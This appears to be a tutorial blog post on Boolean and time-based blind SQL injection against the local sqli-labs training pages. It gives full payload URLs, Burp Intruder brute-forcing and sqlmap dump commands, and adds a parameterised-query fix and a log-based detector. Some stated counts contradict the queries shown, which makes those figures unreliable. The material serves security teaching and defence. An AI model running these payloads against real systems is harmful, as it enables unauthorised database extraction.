SQL injection for web security

Blind SQL injection

  • Contents

  • Blind injection principle

  • Boolean blind injection

  • Time blind injection

  • sqlmap blind injection

 

 

1, Blind injection principle


1. Blind injection application scenario

Blind injection is used where the application gives no detailed echo of the database result. Boolean blind injection infers the answer from whether the page comes back in its normal or abnormal (true / false) state; time blind injection infers it from the delay introduced by sleep().

2. Analysis of blind injection statements

A typical Boolean blind injection statement: select id, username, password from users where id='1' and length(database())=8

What matters here is the and: for the whole condition to be true, both sides must be true. So when the right-hand length(database())=x holds, the normal page is returned; when it does not hold, the error page is returned. Boolean blind injection is injection based on this right / wrong distinction.

3. Blind injection source code analysis

View the source code of Less-8 of sqli-labs-master

  mysql_query function: execute a MySQL query

  mysql_fetch_array function: get a row from the result set as an associative array or a numeric array

The main thing to notice is that a GET variable $id is read and spliced directly into an SQL statement: "SELECT * FROM users WHERE id='$id' LIMIT 0,1"

An if judgment then follows: if the SQL statement returns a row, the page prints "You are in"; if it returns nothing, nothing is printed. In other words, a correct SQL statement yields "You are in" and an incorrect one yields no output.
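Added example, not the lab's PHP source: the same query shape rebuilt in Python over an in-memory sqlite3 database with a few constructed rows, so the oracle described above can be reproduced offline, with the parameter-bound form beside it. The function names, the sample rows and the sqlite3 stand-in for MySQL are mine; sqlite3 also treats `--` as a line comment, so the page's `-- -` payload behaves the same way here.

```python
import sqlite3

# Added example (not the sqli-labs PHP source): a Python/sqlite3 reconstruction
# of the Less-8 query pattern, with the parameterised form beside it.


def make_db():
    # Constructed sample rows shaped like the lab's users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return conn


def lookup_vulnerable(conn, user_id):
    # Same shape as the lab's "SELECT * FROM users WHERE id='$id' LIMIT 0,1":
    # the raw GET value is spliced into the SQL text, so a quote in the input
    # ends the literal and "-- " comments out the rest of the statement.
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone() is not None   # True == "You are in"


def lookup_safe(conn, user_id):
    # Parameter binding: the value travels separately from the SQL text and is
    # only ever compared as data, never parsed as part of the statement.
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone() is not None


def has_boolean_oracle(lookup):
    # The page's injection-point test: if "and 1=1" and "and 1=2" give
    # different answers, the lookup leaks a true/false oracle to the caller.
    conn = make_db()
    true_case = lookup(conn, "1' and 1=1-- -")
    false_case = lookup(conn, "1' and 1=2-- -")
    return true_case != false_case


if __name__ == "__main__":
    print("string-spliced query leaks an oracle:", has_boolean_oracle(lookup_vulnerable))
    print("parameterised query leaks an oracle:", has_boolean_oracle(lookup_safe))
```

With the spliced query the two probes give different answers, which is exactly the right / wrong signal the rest of this page builds on. With the bound parameter the whole string `1' and 1=1-- -` is compared as one value against the id column, so both probes simply find no row, while a plain `1` still works; the fix costs nothing in functionality.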

4. Common functions of blind injection

length()                 returns the number of characters in a string

ascii()                  converts the specified character to its ASCII code

mid(data,start,length)   extracts a substring of the given length, starting at position start

sleep()                  delays the response by the given number of seconds

count()                  counts the number of rows

if()                     conditional expression

2, Boolean blind injection

Target: Less-8 of sqli-labs-master


1. Query injection point

?id=1' and 1=1-- -    normal page;    ?id=1' and 1=2-- -    error page

 

 

 

 

  2. Query database

(1) Query database name characters

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())=8-- -

The database name is 8 characters long

 

 

  (2) Query the first character of database name

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(mid(database(),1,1))=115-- -

 

  ASCII code 115 is the letter s, so the first character is s

ASCII comparison table: ASCII code list / ASCII code comparison table (biancheng.net)

 

  The remaining characters can be brute-forced with Burp Intruder

Burp Intruder steps:

1) Set up the proxy and intercept the request

 

 

  2) Send it to Intruder (shortcut Ctrl+I)

 

 

 

  3) Set the payload positions (the variables)

  4) Under Payloads, configure the dictionaries

First parameter

 

  Second parameter

 

 

  5) Start the attack, then pick out the parameter values whose responses contain the echo

 

 

  From the positions and the ASCII values it is easy to read off that the database name is security

3. Query data table

(1) Number of query data tables

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4-- -

The number of tables in the security database is 5

 

 

  (2) Query the number of characters in the first table

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6-- -

The number of characters in the first table is 6

(3) Query the first character of the first table

 

 

  The other characters are obtained by changing the start position of mid(); the other tables are obtained by changing the offset of limit in the same way. This reveals that a users table exists

4. Query field

(1) Query the number of users table fields

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_name='users' and table_schema='security')=3-- -

The query shows that there are three fields under the users table

 

  (2) Query the number of characters of the first field

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=2-- -

It follows that the first field name is 2 characters long

 

  (3) Query the first character of the first field

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select ascii(mid((column_name),1,1)) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=105-- -

The first character of the first field is i

 

 

  Similarly, the second character is d; the second field is username; the third field is password

5. Query data

(1) Number of query data characters

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(concat(id,0x7e,username,0x7e,password)) from users limit 0,1)=11-- -

The first row's id~username~password string is 11 characters long

 

 

  (2) Query data character

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select ascii(mid((concat(id,0x7e,username,0x7e,password)),1,1)) from users limit 0,1)=49-- -

  The first character is 1 (ASCII 49)

 

 

  Repeating the above steps recovers all the data

 

3. Time blind injection

Target: Less-9 of sqli-labs-master

The only difference between time blind injection and Boolean blind injection: Boolean blind injection judges right / wrong from the page echo; time blind injection judges it from the response delay

 

1. Query injection point

Two MySQL behaviours are observed:

  When a string is compared with a numeric column, only its leading number is matched against the database; whatever characters follow that number have no effect (this applies to numeric columns only)

In Less-9 every input returns the same fixed page, so Boolean blind injection cannot be used; only time-delay blind injection can confirm the injection point

 

 

 With ?id=1' and if(1=1,sleep(0),sleep(5))-- - the response is quick (about 2 s); with ?id=1' and if(1=2,sleep(0),sleep(5))-- - it is slower (about 7 s)

So there is an injection point, and the closing character is the single quote '

 

 

 

 

 

  2. Query database

(1) Query database characters

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(database()))=8,sleep(5),sleep(0))-- -

When the value is 8 the delay is long, so the database name is 8 characters long

 

 

 

 

  (2) Query database first character

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(database(),1,1)))=115,sleep(5),sleep(0))-- -

 

  When the ASCII code of the first character is 115 the delay is long, so the first character of the database name is s

 

 

 

 

  Then, by changing the start position of mid() in the same way, the database name security is obtained one character at a time

3. Query table

(1) Query the number of security tables

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),sleep(0))-- -

When the number of tables is 4, the delay is long; Therefore, there are four tables under the security database

 

 

 

 

 

(2) Query the number of characters in the first table

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6,sleep(5),sleep(0))-- -

 

When the number of characters is 6, the delay is long, so the number of characters in the first table is 6

 

 

 

(3) Query the first character of the first table

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid((table_name),1,1)) from information_schema.tables where table_schema='security' limit 0,1)=101,sleep(5),sleep(0))-- -

When the ASCII code of the first character is 101 the delay is long, so the first character of the first table is e

 

 

  Following the same query pattern, one of the four tables is found to be users

4. Query field

(1) Query the number of fields under the users table

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(column_name) from information_schema.columns where table_name='users' and table_schema='security')=3,sleep(5),sleep(0))-- -

The query shows that there are 5 fields under the users table

 

 

 

(2) Query the number of characters in the first field of the users table

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(column_name) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=2,sleep(5),sleep(0))-- -

The number of characters in the first field is 2

 

 

 

 

 

(3) Query the first character of the first field

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(column_name,1,1)) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=105,sleep(5),sleep(0))-- -

The first character of the first field is i

 

  All fields are obtained with the same routine: id, username, password

5. Query data

(1) Query the number of characters of the first row's data

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(concat(id,0x7e,username,0x7e,password)) from users limit 0,1)=11,sleep(5),sleep(0))-- -

 

This shows that the id~username~password combination of the first row is 11 characters long

 

 

 

  (2) Query the first character of the first row

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(concat(id,0x7e,username,0x7e,password),1,1)) from users limit 0,1)=49,sleep(5),sleep(0))-- -

  The first character of the first row is 1

 

 

  All the characters of the first row are:   1~Dumb~Dumb
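The payloads used in the Boolean section (Less-8) and in this time-based section (Less-9) leave a recognisable trail in the web server's access log, whether they are typed by hand, replayed by Burp Intruder or generated by sqlmap. The following added Python example (mine, not from the original post) runs simple detection logic over a few constructed access-log lines. It assumes a combined log format with a trailing request-time field in seconds, as nginx's $request_time would give; the log lines, the thresholds and the names SAMPLE_LOG, classify, template and analyze are all mine.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Added example (not from the original post): constructed access-log lines in
# the combined format plus a trailing request time in seconds (as nginx's
# $request_time would give). The payloads mirror the Less-8 / Less-9 requests.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Nov/2021:11:39:01 -0500] "GET /sqli-labs-master/Less-8/?id=1 HTTP/1.1" 200 742 0.003
10.0.0.5 - - [28/Nov/2021:11:39:02 -0500] "GET /sqli-labs-master/Less-8/?id=1%27%20and%201=1--%20- HTTP/1.1" 200 742 0.004
10.0.0.5 - - [28/Nov/2021:11:39:03 -0500] "GET /sqli-labs-master/Less-8/?id=1%27%20and%201=2--%20- HTTP/1.1" 200 698 0.003
10.0.0.5 - - [28/Nov/2021:11:39:04 -0500] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20ascii(mid(database(),1,1))=113--%20- HTTP/1.1" 200 698 0.003
10.0.0.5 - - [28/Nov/2021:11:39:04 -0500] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20ascii(mid(database(),1,1))=114--%20- HTTP/1.1" 200 698 0.003
10.0.0.5 - - [28/Nov/2021:11:39:05 -0500] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20ascii(mid(database(),1,1))=115--%20- HTTP/1.1" 200 742 0.003
10.0.0.5 - - [28/Nov/2021:11:39:09 -0500] "GET /sqli-labs-master/Less-9/?id=1%27%20and%20if(1=2,sleep(0),sleep(5))--%20- HTTP/1.1" 200 742 5.012
10.0.0.7 - - [28/Nov/2021:11:39:10 -0500] "GET /sqli-labs-master/Less-8/?id=2 HTTP/1.1" 200 742 0.002
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+) (?P<rtime>[\d.]+)$'
)

# Signatures of the blind-injection building blocks used on this page.
BLIND_PATTERNS = {
    "boolean-probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "char-extraction": re.compile(r"\b(ascii|ord)\s*\(\s*(mid|substr|substring)\s*\(", re.I),
    "length-probe": re.compile(r"\blength\s*\(", re.I),
    "schema-enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "time-delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}
SLOW_SECONDS = 4.0   # a sleep(5) payload that really ran shows up as a slow request


def classify(line):
    """Parse one log line; return a dict with the blind-SQLi tags it triggers."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, raw_query = m.group("target").partition("?")
    query = unquote_plus(raw_query)          # decode %27, %20 etc. before matching
    tags = [name for name, rx in BLIND_PATTERNS.items() if rx.search(query)]
    rtime = float(m.group("rtime"))
    if "time-delay" in tags and rtime >= SLOW_SECONDS:
        tags.append("delay-confirmed")       # the injected sleep actually executed
    return {"client": m.group("client"), "path": path, "query": query,
            "rtime": rtime, "tags": tags}


def template(query):
    # Collapse digit runs so requests that differ only in the compared value
    # (the character-by-character extraction loop) share one template.
    return re.sub(r"\d+", "N", query)


def analyze(log_text, burst_threshold=3):
    """Return (flagged events, {client: [templates probed with >= threshold values]})."""
    events = [e for e in (classify(ln) for ln in log_text.splitlines()) if e]
    flagged = [e for e in events if e["tags"]]
    per_client = defaultdict(lambda: defaultdict(set))
    for e in flagged:
        per_client[e["client"]][template(e["query"])].add(e["query"])
    bursts = {}
    for client, templates in per_client.items():
        hot = [t for t, values in templates.items() if len(values) >= burst_threshold]
        if hot:
            bursts[client] = hot
    return flagged, bursts


if __name__ == "__main__":
    flagged, bursts = analyze(SAMPLE_LOG)
    for e in flagged:
        print(f"{e['client']} {e['path']} {e['tags']} rtime={e['rtime']:.3f}")
    for client, hot in bursts.items():
        print(f"{client}: {len(hot)} extraction loop(s), e.g. {hot[0]}")
```

Two signals are combined. The first is content: after URL decoding, the query string contains the functions this page relies on (length, ascii(mid(...)), information_schema, sleep), and a sleep payload paired with a response time above SLOW_SECONDS is marked delay-confirmed because the database really executed it. The second is shape: a character-by-character extraction needs many requests that are identical except for the number being compared, so collapsing digits to a template and counting distinct values per template per client exposes the loop even when an individual request looks harmless. Both thresholds are starting points to tune against normal traffic for the application in question.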

 

sqlmap tool blind injection


1. Common parameters of sqlmap

-u              specify the URL

-p              specify the parameter to inject

-D              specify the database name

-T              specify the table name

-C              specify the column name

--dbs           list all database names

--current-db    query the current database name

--tables        list all tables

--columns       list all columns

--batch         use the default answer for every prompt (unattended run)

-r              specify the path to a request captured with Burp (suits POST requests and requests that carry a cookie; no separate login step needed)

--forms         automatically identify POST form parameters (suits URLs that need no login; otherwise add the cookie manually)

--cookie        specify a cookie

--technique Q   restrict injection to inline queries

--technique B   restrict injection to Boolean blind injection

--technique T   restrict injection to time blind injection

--technique U   restrict injection to UNION queries

2. sqlmap Boolean blind injection

Target: Less-8 of sqli-labs-master

Attacker: 127.0.0.1

(1) Query whether there is an injection point

sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --batch

The query shows that the id parameter is a Boolean-based injection point

 

 

 

 

 

  (2) Query current database name

sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --current-db --batch

 

  (3) Query table name

sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security --tables --batch

 


(4) Query field name

sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security -T users --columns --batch

  

 

  (5) Query data

sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security -T users -C username --dump --batch

 

 

 

3. sqlmap time blind injection

 

Target: sqli labs master 9th pass

 

Time blind injection works the same way as Boolean blind injection, except that --technique B is replaced with --technique T

(1) Query whether there is an injection point

(omitted, same as above)

(2) Query database name

(omitted, same as above)

(3) Query table name

(omitted, same as above)

(4) Query field name

(omitted, same as above)

(5) Query data

sqlmap -u "127.0.0.1/sqli-labs-master/Less-9/?id=1" --technique T -D security -T users -C username --dump --batch

  

 

 

 

  Time-based injection is slow to wait for, but given enough time it succeeds

 

Tags: Web Security

Posted on Sun, 28 Nov 2021 06:39:38 -0500 by MrRosary